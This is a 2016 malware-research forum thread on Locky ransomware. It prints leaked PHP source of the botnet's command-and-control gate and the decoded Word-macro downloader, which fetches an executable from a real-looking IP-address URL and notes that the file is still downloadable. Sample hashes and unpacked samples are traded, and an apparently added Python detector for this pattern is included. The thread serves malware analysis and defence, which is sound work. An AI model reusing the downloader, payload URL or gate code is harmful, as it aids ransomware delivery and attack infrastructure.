Locky ransomware

Locky ransomware

Postby Blaze » Wed Feb 17, 2016 4:48 pm

You do not have the required permissions to view the files attached to this post.
Follow me on Twitter: @bartblaze
Blaze
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Locky ransomware

Postby maddog4012 » Wed Feb 17, 2016 7:42 pm

This malware is dropped from a Word doc that arrives in e-mail.
You do not have the required permissions to view the files attached to this post.
maddog4012
Posts: 43
Joined: Mon Aug 04, 2014 6:53 pm
Reputation point: 35

Re: Locky ransomware

Postby benkow_ » Thu Feb 18, 2016 8:49 am

Not really useful, but for some minutes the panel server had some problems and we were able to download PHP files.
gates: (main.php)
Code:
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

// Only POST is accepted; anything else gets a 404 so the gate looks like a dead page
if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
// The raw body is decrypted (decrypt_bot_request lives in functions.php) and parsed into $_POST
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/* Debug logging of the decrypted request, left commented out by the panel author
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

// Dispatch on 'act' to a handler in actions/; basename() keeps the lookup inside that directory
$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
benkow_
Posts: 69
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 41

Re: Locky ransomware

Postby eli » Thu Feb 18, 2016 12:43 pm

Seems like it stopped working. Servers taken down?
eli
Posts: 1
Joined: Wed Feb 10, 2016 12:48 pm
Reputation point: 0

Re: Locky ransomware

Postby frank_boldewin » Tue Feb 23, 2016 4:23 pm

eli wrote: Seems like it stopped working. Servers taken down?

maddog4012's doc file starts a macro with some obfuscated VB code that decodes to the following code:

Code:
function downloadToFile(url,file)
{
   var xhr=new ActiveXObject("msxml2.xmlhttp");
   ado=new ActiveXObject("ADODB.Stream");
   xhr.open("GET",url,false);
   xhr.send();
   if(xhr.status===200)
   {
      ado.type=1;
      ado.open();
      ado.write(xhr.responseBody);
      ado.saveToFile(file);
      ado.close();
      return xhr.responseBody;
   }
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);


The executable can still be downloaded.
frank_boldewin
Posts: 115
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Reputation point: 89
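A defender-side check for the pattern in the decoded macro above, added here as an example and not code from the thread: it scans a de-obfuscated macro body for the MSXML HTTP object plus ADODB.Stream save-to-disk combination and extracts the URLs to block or hunt for. The sample macro is constructed from the listing above with a placeholder URL in place of the live one.

```python
import re

# Constructed sample: the decoded macro body from the post above, placeholder URL substituted.
SAMPLE_MACRO = r'''
function downloadToFile(url,file)
{
   var xhr=new ActiveXObject("msxml2.xmlhttp");
   ado=new ActiveXObject("ADODB.Stream");
   xhr.open("GET",url,false);
   xhr.send();
   if(xhr.status===200)
   {
      ado.type=1;
      ado.open();
      ado.write(xhr.responseBody);
      ado.saveToFile(file);
      ado.close();
   }
}
downloadToFile('http://203.0.113.10/~user/dir/payload',fundamentally);
'''

# Indicators of the download-and-drop pattern, each matched case-insensitively.
INDICATORS = {
    "http_object": re.compile(
        r'ActiveXObject\(\s*["\'](?:msxml2\.xmlhttp|microsoft\.xmlhttp|winhttp\.winhttprequest[^"\']*)["\']',
        re.I),
    "stream_object": re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I),
    "save_to_file": re.compile(r'\.saveToFile\s*\(', re.I),
    "binary_mode": re.compile(r'\.type\s*=\s*1\b', re.I),   # adTypeBinary on the stream
}
URL_RE = re.compile(r'https?://[^\s\'"<>]+', re.I)


def analyze_macro(text):
    """Return (is_downloader, matched indicator names, URLs) for a decoded macro body."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    urls = sorted(set(URL_RE.findall(text)))
    # Verdict needs both an HTTP fetch and a write to disk, not just one of them.
    is_downloader = "http_object" in hits and ("stream_object" in hits or "save_to_file" in hits)
    return is_downloader, hits, urls


if __name__ == "__main__":
    verdict, hits, urls = analyze_macro(SAMPLE_MACRO)
    print("downloader:", verdict)
    print("indicators:", hits)
    print("urls to block/hunt:", urls)
```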

Re: Locky ransomware

Postby frank_boldewin » Wed Feb 24, 2016 2:14 pm

Just in case one is interested: attached is an unpacked version of Locky.
You do not have the required permissions to view the files attached to this post.
frank_boldewin
Posts: 115
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Reputation point: 89

Re: Locky ransomware

Postby w0rm » Wed Feb 24, 2016 5:38 pm

There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)
w0rm
Posts: 1
Joined: Mon Apr 21, 2014 4:09 pm
Reputation point: 0

Re: Locky ransomware

Postby Xylitol » Wed Feb 24, 2016 6:27 pm

In attachment.
You do not have the required permissions to view the files attached to this post.
Xylitol
Global Moderator
Posts: 1629
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 485

Re: Locky ransomware

Postby FafZee » Thu Feb 25, 2016 8:37 am

Unpacked in attachment
You do not have the required permissions to view the files attached to this post.
FafZee
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am
Reputation point: 14

Re: Locky ransomware

Postby p1nk » Fri Feb 26, 2016 7:12 am

benkow_ wrote: Not really useful, but for some minutes the panel server had some problems and we were able to download PHP files.
gates: (main.php)
Code:
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
Do you have an archive of all the collected PHP pages?
p1nk
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2
